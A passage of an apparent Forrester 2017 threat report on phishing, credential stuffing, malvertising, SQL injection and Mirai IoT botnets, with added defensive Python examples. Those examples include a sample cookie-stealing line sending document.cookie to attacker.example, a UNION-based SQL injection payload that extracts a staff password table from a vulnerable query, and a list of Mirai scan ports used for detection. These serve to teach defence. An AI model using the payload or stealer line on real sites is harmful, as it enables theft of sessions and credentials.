endnote 4) This isn't 2000 where attackers own mail clients as soon as a user opens an
email, but it might as well be. The 2016 Verizon Data Breach Investigations Report
tracked over 8 million phishing simulations and found that 13% of recipients not only
opened the email but went on to click links or open attachments that would guarantee
infection. (see endnote 5) It's not just phishing attacks that use email as a threat vector.
BEC is a form of social engineering that follows the general story arc of someone posing
as the CEO who asks an employee to pay an invoice, and the helpful employee goes
about doing it. The United States Federal Bureau of Investigation estimates that BEC has
cost companies $3.1 billion between October 2013 and May 2016, when the report was
published. (see endnote 6)
What do about it: Train employees to spot these attacks. Education and phishing
simulations may help raise user awareness to reduce the effectiveness of phishing
campaigns, but experience shows that this isn't a total solution. Understanding that this
class of attack targets an individual, you also need to harden business processes for
transactions involving money or critical data to empower your staff to ask questions and
eliminate this risk.
No 3: Credential Stuffing, Or How Someone Else's Breach Hurts You
There are approximately 3.5 billion internet users worldwide. (see endnote 7) As the number of
internet users has grown, so too has the scale of data breaches: Many breaches of the past several
years broke the 100 million customer record barrier (e.g., Home Depot, Yahoo). In the case of
Yahoo, which suffered a compromise of 1 billion customer records, that's over 28%, almost one-
third of all internet users. (see endnote 8) The majority of people on the internet have had their
credentials compromised at least once. Here's the stark reality: Dropbox was compromised with
an employee's credentials that attackers had stolen in a LinkedIn breach: (see endnote 9)
What you need to know: Stolen credentials represent a reputational risk to you. There are
a number of ways cybercriminals can monetize stolen credentials that aren't immediately
obvious. Loyalty fraud is becoming extremely popular and profitable, with 72% of
loyalty program managers reporting fraud-related issues. (see endnote 10) According to
The Points Guy, points are worth a cent or two each, and one can cash them out for
anything from gift cards to resort stays. (see endnote 11) The fact that it's a lot easier to
launder points than money stolen from banking fraud makes this an attractive business
model. Unfortunately, this could turn your loyalty program into a customer experience
nightmare.
What to do about it: Incorporate threat intel with user behavior analytics. Phishers and
spammers have essentially two challenges to overcome: They have to reach your inbox and
then get a click. An established identity and reputation are two key factors marketing
firms rely on to get their messages into your inbox, and by sending from compromised
accounts, criminals play the same game with less restraint. Companies like Emailage and
ThreatMetrix try to help the enterprise by developing user reputation scores based on
everything from account age to social media footprint. The problem is that the share of
users whose information has been breached is so high that S&R pros must assume the
account is not necessarily being operated by its legitimate user ( see Figure 3 ). Thus,
it's important to use technologies such as security user behavior analytics to baseline
each account's normal behavior and alert on deviations: a successful login from a source
the user has never used before, or a burst of login attempts against many different
accounts from one source, are the signatures of credential stuffing. (see endnote 12)
Figure 3: Top Breaches As A Percentage Of Worldwide Internet Users
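The following is an added example, not code from the report or from any vendor it names, showing the two credential-stuffing signals described above computed over a handful of constructed login events (the usernames, IP addresses, and user agents are invented for illustration): a source that tries many different usernames with a high failure ratio inside a short window, and an established account that suddenly succeeds from a source it has never used before.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample login events, not real log data.
# Fields: ISO timestamp, username, source IP, user agent, result ("ok" or "fail").
SAMPLE_EVENTS = [
    ("2016-11-01T10:00:00", "alice", "198.51.100.7", "Mozilla/5.0 (Macintosh)", "ok"),
    ("2016-11-02T10:03:00", "alice", "198.51.100.7", "Mozilla/5.0 (Macintosh)", "ok"),
    ("2016-11-03T09:58:00", "alice", "198.51.100.7", "Mozilla/5.0 (Macintosh)", "fail"),  # typo, then retry
    ("2016-11-03T09:58:20", "alice", "198.51.100.7", "Mozilla/5.0 (Macintosh)", "ok"),
    ("2016-11-03T12:00:00", "bob", "203.0.113.5", "Mozilla/5.0 (Windows)", "ok"),
    # A breached credential list being replayed from one host with a scripted client:
    ("2016-11-04T03:00:01", "alice", "192.0.2.44", "python-requests/2.11", "ok"),
    ("2016-11-04T03:00:02", "bob", "192.0.2.44", "python-requests/2.11", "fail"),
    ("2016-11-04T03:00:03", "carol", "192.0.2.44", "python-requests/2.11", "fail"),
    ("2016-11-04T03:00:04", "dave", "192.0.2.44", "python-requests/2.11", "fail"),
    ("2016-11-04T03:00:05", "erin", "192.0.2.44", "python-requests/2.11", "fail"),
    ("2016-11-04T03:00:06", "frank", "192.0.2.44", "python-requests/2.11", "fail"),
    ("2016-11-04T03:00:07", "grace", "192.0.2.44", "python-requests/2.11", "ok"),
    ("2016-11-04T03:00:08", "heidi", "192.0.2.44", "python-requests/2.11", "fail"),
    ("2016-11-04T08:30:00", "bob", "203.0.113.5", "Mozilla/5.0 (Windows)", "ok"),
]


def parse_events(rows):
    """Turn raw tuples into dicts with datetime timestamps, sorted chronologically."""
    events = [
        {"time": datetime.fromisoformat(t), "user": u, "src_ip": ip, "ua": ua, "result": r}
        for t, u, ip, ua, r in rows
    ]
    return sorted(events, key=lambda e: e["time"])


def detect_stuffing_sources(events, window=timedelta(minutes=5), min_users=5, min_fail_ratio=0.6):
    """Source-centric signal: flag any source IP that, inside one `window`, tried at least
    `min_users` distinct usernames with a failure ratio of at least `min_fail_ratio`.
    Returns {src_ip: {"distinct_users": n, "fail_ratio": r}} for the widest flagged window."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["src_ip"]].append(e)
    flagged = {}
    for ip, evs in by_ip.items():
        start = 0
        for end in range(len(evs)):
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1  # slide the window forward
            span = evs[start:end + 1]
            users = {e["user"] for e in span}
            fails = sum(1 for e in span if e["result"] != "ok")
            ratio = fails / len(span)
            if len(users) >= min_users and ratio >= min_fail_ratio:
                best = flagged.get(ip)
                if best is None or len(users) > best["distinct_users"]:
                    flagged[ip] = {"distinct_users": len(users), "fail_ratio": round(ratio, 2)}
    return flagged


def detect_account_takeovers(events, min_history=2):
    """Account-centric signal: flag a successful login by a user who already has at least
    `min_history` prior successes, arriving from a (src_ip, user_agent) pair never seen in
    that history. Returns a list of (user, iso_time, src_ip)."""
    seen = defaultdict(set)        # user -> (ip, ua) pairs from prior successful logins
    successes = defaultdict(int)   # user -> number of prior successful logins
    alerts = []
    for e in events:
        if e["result"] != "ok":
            continue
        pair = (e["src_ip"], e["ua"])
        if successes[e["user"]] >= min_history and pair not in seen[e["user"]]:
            alerts.append((e["user"], e["time"].isoformat(), e["src_ip"]))
        seen[e["user"]].add(pair)
        successes[e["user"]] += 1
    return alerts


if __name__ == "__main__":
    events = parse_events(SAMPLE_EVENTS)
    print("stuffing sources:", detect_stuffing_sources(events))
    print("account takeovers:", detect_account_takeovers(events))
```

The two signals cover each other's blind spots: the attacker's successful hit on "grace" is invisible to the account-centric check because grace has no history to compare against, but the burst from 192.0.2.44 catches it; alice's own failed-then-successful login from her usual machine trips neither. In production the thresholds belong in configuration and the baseline should include more than IP and user agent (ASN, geography, device fingerprint), but the structure is the same.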

No. 4: The Web Application Paradigm


Web application attacks are a major part of the malware ecosystem we described earlier. Traffic
distribution networks require legitimate traffic to route and somewhere to host the exploit kit.
Your site may be attractive for indirect reasons you haven't yet thought of:
What you need to know: You are infecting your customers right now. In 1984, Ken
Thompson published "Reflections on Trusting Trust," showing that you cannot trust code
you did not create yourself, down to the compiler. (see endnote 13) These days, we're loading
remote JavaScript libraries, trackers, and fonts, and then trusting ad networks to serve
safe content to our users. You need to be accountable for everything you load when a
visitor comes to your site. The New York Times, BBC, MSN, Xfinity, and the NFL have all
been hit with malvertising campaigns, becoming infection vectors for their own readers.
(see endnote 14) In the future, expect cybercriminals to combine the strategy behind
malvertising with strategic compromises of the sites hosting the other code you load,
turning your site into a watering hole. For years, we have implored organizations to stop
loading code from remote websites. Now is the time to stop: host the libraries you depend
on yourself, and where a third-party script is unavoidable, pin it to the exact version
you reviewed.
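As an added example (not from the report), here is how to pin a third-party script you have reviewed using Subresource Integrity (SRI), the browser mechanism for exactly this problem: the page ships a hash of the script, and the browser refuses to execute a fetched body that does not match. The script body and the CDN URL are constructed for illustration; the hashing and tag format follow the SRI specification, and the checker mirrors the browser's rule of honoring only the strongest algorithm listed.

```python
import base64
import hashlib

# Constructed sample resources, not a real library: the script you reviewed, and the same
# script after someone upstream (CDN, vendor, or attacker) appended a cookie stealer.
ORIGINAL_JS = b"window.track = function (e) { /* vendor analytics */ };\n"
TAMPERED_JS = ORIGINAL_JS + b"new Image().src = 'https://attacker.example/?c=' + document.cookie;\n"

# Hash functions SRI allows, with the ranking browsers use to pick the strongest one.
SRI_ALGORITHMS = {
    "sha256": (hashlib.sha256, 1),
    "sha384": (hashlib.sha384, 2),
    "sha512": (hashlib.sha512, 3),
}


def sri_digest(body, algo="sha384"):
    """Return the SRI token for `body`, e.g. 'sha384-<base64 digest>'."""
    if algo not in SRI_ALGORITHMS:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    hasher = SRI_ALGORITHMS[algo][0]
    return f"{algo}-{base64.b64encode(hasher(body).digest()).decode('ascii')}"


def script_tag(src, body, algo="sha384"):
    """Build the <script> tag that pins `src` to the hash of the `body` you reviewed.
    crossorigin="anonymous" is required for SRI to be enforced on a cross-origin script."""
    return (f'<script src="{src}" integrity="{sri_digest(body, algo)}" '
            f'crossorigin="anonymous"></script>')


def sri_matches(body, integrity):
    """Apply the browser's rule offline: among the tokens in `integrity`, keep only those
    using the strongest recognised algorithm, and accept `body` if it matches any of them.
    A browser treats an attribute with no recognised tokens as absent and loads the
    resource anyway; this returns False instead, which is the right default for a build check."""
    tokens = []
    for token in integrity.split():
        algo, _, _ = token.partition("-")
        if algo in SRI_ALGORITHMS:
            tokens.append((SRI_ALGORITHMS[algo][1], algo, token))
    if not tokens:
        return False
    strongest = max(strength for strength, _, _ in tokens)
    return any(sri_digest(body, algo) == token
               for strength, algo, token in tokens if strength == strongest)


if __name__ == "__main__":
    print(script_tag("https://cdn.example/vendor.js", ORIGINAL_JS))
    print("original passes:", sri_matches(ORIGINAL_JS, sri_digest(ORIGINAL_JS)))
    print("tampered passes:", sri_matches(TAMPERED_JS, sri_digest(ORIGINAL_JS)))
```

SRI pins bytes, so it only works for resources whose content you can review and that do not change underneath you; it cannot protect an ad slot that serves rotating creatives or a loader script that pulls further scripts at runtime. For those, the report's advice stands: if you cannot pin it, do not load it.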
What to do about it: Like polio, it's time to eradicate SQL injection. SQL injection, a
pernicious web application attack, lets an attacker run arbitrary SQL statements through
your web application, exfiltrating the contents of your database and, on some database
platforms, executing commands on the database host. Unfortunately, SQL injection is still
responsible for almost half of all web application attacks detected by Akamai. (see endnote
15) The fix is well understood: security pros must ensure that app developers use prepared
statements (parameterized queries), which pass user input to the database as a bound value
rather than as part of the SQL text, so the input can never change the structure of the
query. One caveat: parameters carry values, not identifiers, so user input that selects a
table, column, or sort order must instead be mapped against an allow-list, and stored
procedures that build dynamic SQL internally need the same review. DevOps methodologies
are increasing the pace of app releases, straining security teams at a time when their
expertise is already scarce. Security pros must join with developers and operations pros
in DevOps practices or lose the opportunity to systematically improve application
security. (see endnote 16)
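An added example, not from the report, showing the vulnerable and the fixed query side by side against an in-memory SQLite database with constructed rows, plus the allow-list pattern for the one place parameters cannot help (a user-chosen sort column). The payload is a classic UNION-based exfiltration: in the concatenated version it returns the staff table; in the parameterized version the same string is just a name nobody has.

```python
import sqlite3


def setup_db():
    """In-memory database with constructed sample rows (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT, email TEXT);
        CREATE TABLE staff (username TEXT, password_hash TEXT);
        INSERT INTO customers (name, email) VALUES ('Ann Lee', 'ann@example.org');
        INSERT INTO customers (name, email) VALUES ('Raj Patel', 'raj@example.org');
        INSERT INTO staff VALUES ('admin', '$2b$12$constructedhashvalue');
    """)
    return conn


def find_customer_vulnerable(conn, name):
    """The anti-pattern: user input spliced into the SQL text, so a quote character
    lets the caller end the string literal and append their own SQL."""
    sql = f"SELECT name, email FROM customers WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def find_customer_safe(conn, name):
    """Prepared statement: the driver sends `name` as a bound value, never as SQL text."""
    return conn.execute(
        "SELECT name, email FROM customers WHERE name = ?", (name,)
    ).fetchall()


# Identifiers cannot be bound as parameters, so user input that picks a column is
# mapped through an allow-list; anything not in the map is rejected outright.
ALLOWED_SORT = {"name": "name", "email": "email"}


def list_customers_sorted(conn, sort_by):
    column = ALLOWED_SORT.get(sort_by)
    if column is None:
        raise ValueError(f"unsupported sort column: {sort_by!r}")
    return conn.execute(f"SELECT name, email FROM customers ORDER BY {column}").fetchall()


# Constructed attacker input: closes the string, UNIONs in the staff table, and comments
# out the trailing quote. Two columns are selected to match the original query's shape.
PAYLOAD = "x' UNION SELECT username, password_hash FROM staff--"


if __name__ == "__main__":
    conn = setup_db()
    print("vulnerable:", find_customer_vulnerable(conn, PAYLOAD))
    print("safe:      ", find_customer_safe(conn, PAYLOAD))
    print("sorted:    ", list_customers_sorted(conn, "email"))
```

The same shape applies in any driver: the `?` placeholder is SQLite's; psycopg2 uses `%s`, JDBC uses `?` with `PreparedStatement`, and ORMs parameterize by default unless a developer reaches for raw string building. Code review and static analysis should flag any query text assembled with concatenation or string formatting, which is exactly what the vulnerable function above does.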
No. 5: Cybercriminals Have Weaponized The Internet Of Things (IoT)
Gone are the days of mom-and-pop botnets built from unpatched AOL users. There was a
major escalation in the DDoS arms race in 2016 when cybercriminals released the source code
for Mirai, an IoT worm, after a record-breaking proof of capability against Brian Krebs' blog
site. (see endnote 17) Cybercriminals have continuously iterated on this same code and used
it in increasingly damaging attacks in the last few months of 2016 ( see Figure 4 ). (see
endnote 18) We are now living in the dystopian IoT future we have feared:
What you need to know: Mirai is a fully armed and operational DDoS battle station.
Initial variants of Mirai relied on a list of default credentials to log in over telnet to
security cameras and digital video recorders (DVRs), but cybercriminals have armed the
latest variant with exploit code targeting home DSL routers. (see endnote 19) This is
significant because it marks the start of a trend toward more sophisticated attacks, which
greatly increases the number of devices they can infect. Keep in mind that for all its
destructive capabilities, Mirai is still the little cousin of Bashlight, which is known to
have infected about a million devices. (see endnote 20) Developments such as this are only
one sign of things to come, as cybercriminals have made significant investments in
infrastructure to add resilience to this dangerous botnet. (see endnote 21)
What you need to do: Prepare for IoT ransomware. In August, security researchers
demonstrated a proof-of-concept ransomware strain that attacked an IoT thermostat,
turning the temperature up to 99 degrees Fahrenheit and locking its controls until a
ransom was paid. (see endnote 22) While traditional ransomware is an extortion play based
on denying the user access to their data, IoT gives attackers new ways to make targets
miserable and even put them in physical danger. As researchers explore the potential for
ransomware targeting vehicles, operational technology, and even medical equipment, it's
essential to have a plan for how your organization will respond. One challenge with IoT
devices is that device constraints prevent you from loading traditional endpoint
protection on them, so the controls have to live in the network. Look to leverage Zero
Trust to segment IoT devices from the rest of the network, allow them only the outbound
connections they need, and limit the IoT attack surface. (see endnote 23)
Figure 4: The Mirai 2016 Timeline
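An added example, not from the report, of the segmentation control the section recommends: an egress allow-list for an IoT VLAN, evaluated over constructed flow records. The address ranges, the vendor-cloud network, and the allowed services are assumptions for illustration. A device infected with Mirai-style malware reveals itself immediately, because its telnet and TR-064 scanning and any lateral connection into the corporate LAN are denied and logged, while the device's legitimate traffic to its vendor's service keeps working.

```python
import ipaddress
from collections import Counter

# Segments in this constructed example (assumed addressing, not from the report).
IOT_VLAN = ipaddress.ip_network("10.20.0.0/24")
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Ports the 2016 Mirai variants scanned: telnet, the alternate telnet port, and TR-064 (7547)
# on DSL routers. Kept separate so a scan gets its own alert label rather than a generic deny.
MIRAI_SCAN_PORTS = {23, 2323, 7547}

# Egress allow-list for the IoT segment: (destination network, destination port).
# Everything not listed is denied. The networks and services here are assumptions.
IOT_EGRESS_ALLOW = [
    (ipaddress.ip_network("198.51.100.0/24"), 443),  # camera vendor's cloud service and firmware updates
    (ipaddress.ip_network("10.20.0.1/32"), 123),     # NTP on the segment gateway
    (ipaddress.ip_network("10.20.0.1/32"), 53),      # DNS resolver on the segment gateway
]


def evaluate_flow(src, dst, dport):
    """Return 'allow' or a 'deny: <reason>' verdict for one flow. Only flows whose
    source is inside the IoT VLAN are subject to this policy."""
    s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    if s not in IOT_VLAN:
        return "allow"
    for net, port in IOT_EGRESS_ALLOW:
        if d in net and dport == port:
            return "allow"
    # Deny reasons are ordered so the most alert-worthy label wins: a probe on a Mirai
    # propagation port is reported as such even when the target is an internal host.
    if dport in MIRAI_SCAN_PORTS:
        return "deny: Mirai propagation port"
    if any(d in net for net in INTERNAL_NETS):
        return "deny: lateral movement out of IoT segment"
    return "deny: not in egress allow-list"


def audit(flows):
    """Evaluate (src, dst, dport) records and count verdicts per source device."""
    return Counter((src, evaluate_flow(src, dst, dport)) for src, dst, dport in flows)


# Constructed flow records: an infected DVR at 10.20.0.15, and a corporate laptop.
SAMPLE_FLOWS = [
    ("10.20.0.15", "198.51.100.20", 443),   # DVR talking to its vendor cloud: fine
    ("10.20.0.15", "10.20.0.1", 123),       # DVR syncing time: fine
    ("10.20.0.15", "203.0.113.9", 23),      # telnet scan of the internet
    ("10.20.0.15", "203.0.113.10", 2323),   # alternate telnet port
    ("10.20.0.15", "10.10.0.50", 7547),     # TR-064 probe against the corporate LAN
    ("10.20.0.15", "10.10.0.50", 445),      # SMB into the corporate LAN
    ("10.20.0.15", "203.0.113.77", 6667),   # assumed command-and-control channel
    ("10.10.0.7", "203.0.113.9", 23),       # laptop: not governed by the IoT policy
]


if __name__ == "__main__":
    for (src, verdict), count in sorted(audit(SAMPLE_FLOWS).items()):
        print(f"{src:12} {verdict:45} {count}")
```

The point of the allow-list is that it needs no signature for the next Mirai variant: whatever port or exploit it picks, the infected device can only reach the handful of destinations its job requires, and every denied flow is a log line naming the device to pull and reflash. Translate the same table into your firewall or switch ACL syntax and feed the deny log to the same monitoring that watches the rest of the network.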

RECOMMENDATIONS
Ensure That You Follow The Core Tenets Of Zero Trust
Zero Trust is a fundamental rethinking of corporate security from a failed, perimeter-centric
approach to one that is data-centric and more appropriate for digital businesses (where S&R pros
have far less control over networks, endpoints, IoT devices, apps, and people). Three concepts
underpin Zero Trust. S&R pros must: 1) verify and secure all resources and data assets regardless
of location; 2) limit and strictly enforce access control across all user populations,
devices/channels, and hosting models; and 3) continuously log and inspect all traffic, both
internal and external. Heading into 2017, we recommend that S&R pros:
Ensure your vulnerability management solution provides endpoint visibility. To
understand risk exposure, it's not enough to perform external scans of systems,
particularly user systems. Attackers rarely gain access to user systems through
exposed network services; they come in through the software your users read email,
surf the web, and open documents with.
Apply user behavior analytics to your customer base for fraud detection. In a
world rife with password reuse and frequent data breaches, credential stuffing is an
immediate concern. You need to be able to detect when good users suddenly go bad as an
indication of compromise in order to limit financial and reputational damage.
Make sure you're covered for DDoS. There's been major escalation in DDoS capabilities,
and your current coverage may no longer be sufficient in this new age of IoT botnets.
Review your DDoS mitigation strategies, and talk to critical third-party service providers
to ensure they're prepared as well.
SUPPLEMENTAL MATERIAL
Survey Methodology
Forrester collaborated with CyberFactors to obtain the data in this report. The data may contain
publicly available information and/or proprietary data collected by CyberFactors. The analysis of
the data is exclusively Forrester's. More information about CyberFactors is available at
cyberfactors.com.
Forrester's Global Business Technographics Security Survey, 2016, was fielded from March to May
2016. This online survey included 3,588 respondents in Australia, Brazil, Canada, China, France,
Germany, India, New Zealand, the UK, and the US from companies with two or more
employees.
Forrester's Business Technographics ensures that the final survey population contains only those
with significant involvement in the planning, funding, and purchasing of business and
technology products and services. Research Now fielded this survey on behalf of Forrester.
Survey respondent incentives include points redeemable for gift certificates.
ENDNOTES
1. Source: Ed Miles, "A Case Of Keitaro (featuring RIG And Nuclear)," Zscaler blog, February 29, 2016 (http://www.zscaler.com/blogs/research/case-keitaro-featuring-rig-and-nuclear).
2. See the Forrester report "Four Ways Cybercriminals Exploit Social Media."
3. Source: Joanna Belbey, "Beware Of Social Media And Cybersecurity," Forbes, February 29, 2016 (http://www.forbes.com/sites/joannabelbey/2016/02/29/beware-of-social-media-and-cybersecurity/2/#7c14499a182a).
4. Source: "Spear Phishing 101: What is Spear Phishing?" Trend Micro, September 24, 2015 (http://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/spear-phishing-101-what-is-spear-phishing).
5. Source: "Verizon's 2016 Data Breach Investigations Report," Verizon, 2016 (http://www.verizonenterprise.com/verizon-insights-lab/dbir/2016/).
6. Source: "Business E-Mail Compromise: The 3.1 Billion Dollar Scam," Internet Crime Complaint Center, June 14, 2016 (http://www.ic3.gov/media/2016/160614.aspx).
7. Source: "Internet Users," Internet Live Stats (http://www.internetlivestats.com/internet-users/).
8. Source: Robert McMillan, Ryan Knutson, and Deepa Seetharaman, "Yahoo Discloses New Breach of 1 Billion User Accounts," The Wall Street Journal, December 15, 2016 (http://www.wsj.com/articles/yahoo-discloses-new-breach-of-1-billion-user-accounts-1481753131).
9. Source: Kate Conger and Matthew Lynley, "Dropbox employee's password reuse led to theft of 60M+ user credentials," TechCrunch, August 30, 2016 (http://techcrunch.com/2016/08/30/dropbox-employees-password-reuse-led-to-theft-of-60m-user-credentials/).
10. Source: Mike McDonnell, "Loyalty Fraud: A Rising Threat to Consumers and Businesses," 1to1 Media blog, March 11, 2016 (http://www.1to1media.com/customer-loyalty/loyalty-fraud-rising-threat-consumers-and-businesses).
11. Source: "What Are Points & Miles Worth? November Monthly Valuations," The Points Guy, November 2, 2016 (http://thepointsguy.com/2016/11/november-2016-monthly-valuations).
12. See the Forrester report "Vendor Landscape: Security User Behavior Analytics (SUBA)."
13. Source: Ken Thompson, "Reflections on trusting trust," Communications of the ACM, August 1984 (http://dl.acm.org/citation.cfm?id=358210).
14. Source: Jérôme Segura, "Large Angler Malvertising Campaign Hits Top Publishers," Malwarebytes Labs, March 15, 2016 (http://blog.malwarebytes.com/threat-analysis/2016/03/large-angler-malvertising-campaign-hits-top-publishers).
15. Source: "Q3 State of the Internet / Security Report," Akamai (http://content.akamai.com/pg7407-soti-security-report-q3-en.html).
16. See the Forrester report "Secure Applications At The Speed Of DevOps."
17. Source: Brian Krebs, "Source Code for IoT Botnet 'Mirai' Released," Krebs on Security, October 16, 2016 (https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/).
18. Source: Waqas Amir, "Akamai Kicks off Brian Krebs from its network after 665 Gbps DDoS attack," HackRead, September 23, 2016 (http://www.hackread.com/brian-krebs-665-gbps-ddos-attack-akamai/); Eduard Kovacs, "Hosting Provider OVH Hit by 1 Tbps DDoS Attack," SecurityWeek, September 23, 2016 (http://www.securityweek.com/hosting-provider-ovh-hit-1-tbps-ddos-attack); Brian Krebs, "Source Code for IoT Botnet 'Mirai' Released," Krebs on Security, October 16, 2016 (https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/); Scott Hilton, "Dyn Analysis Summary Of Friday October 21 Attack," Dyn, October 26, 2016 (https://dyn.com/blog/dyn-analysis-summary-of-friday-october-21-attack/); Kevin Beaumont, "'Shadows Kill' Mirai DDoS botnet testing large scale attacks, sending threatening messages about UK and attacking researchers," Medium, November 3, 2016 (https://medium.com/@networksecurity/shadows-kill-mirai-ddos-botnet-testing-large-scale-attacks-sending-threatening-messages-about-6a61553d1c7#.3ief6l178); "Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)," Exploit Database, November 8, 2016 (https://www.exploit-db.com/exploits/40740/); Dan Goodin, "Newly discovered router flaw being hammered by in-the-wild attacks," Ars Technica, November 29, 2016 (http://arstechnica.com/security/2016/11/notorious-iot-botnets-weaponize-new-flaw-found-in-millions-of-home-routers/); Graeme Burton, "TalkTalk and Post Office routers downed in Mirai botnet attack," The Inquirer, December 2, 2016 (http://www.theinquirer.net/inquirer/news/2478916/talktalk-and-post-office-routers-downed-in-mirai-botnet-attack); Liu Ya, "Now Mirai Has DGA Feature Built in," Network Security Research Lab at 360, December 9, 2016 (http://blog.netlab.360.com/new-mirai-variant-with-dga/); and Catalin Cimpanu, "Security Firms Almost Brought Down Massive Mirai Botnet," BleepingComputer, December 16, 2016 (http://www.bleepingcomputer.com/news/security/security-firms-almost-brought-down-massive-mirai-botnet/).
19. Source: John Leyden, "Sh... IoT just got real: Mirai botnet attacks targeting multiple ISPs," The Register, December 2, 2016 (http://www.theregister.co.uk/2016/12/02/broadband_mirai_takedown_analysis/).
20. Source: Dan Goodin, "Brace yourselves—source code powering potent IoT DDoSes just went public," Ars Technica, October 3, 2016 (http://arstechnica.com/security/2016/10/brace-yourselves-source-code-powering-potent-iot-ddoses-just-went-public/).
21. Source: Brian Krebs, "New Mirai Worm Knocks 900K Germans Offline," Krebs on Security, November 16, 2016 (http://krebsonsecurity.com/2016/11/new-mirai-worm-knocks-900k-germans-offline/).
22. Source: Darlene Storm, "Hackers demonstrated first ransomware for IoT thermostats at DEF CON," Computerworld, August 8, 2016 (http://www.computerworld.com/article/3105001/security/hackers-demonstrated-first-ransomware-for-iot-thermostats-at-def-con.html).
23. See the Forrester report "The IoT Attack Surface Transcends The Digital-Physical Divide."
© 2017, Forrester Research, Inc. and/or its subsidiaries. All rights reserved.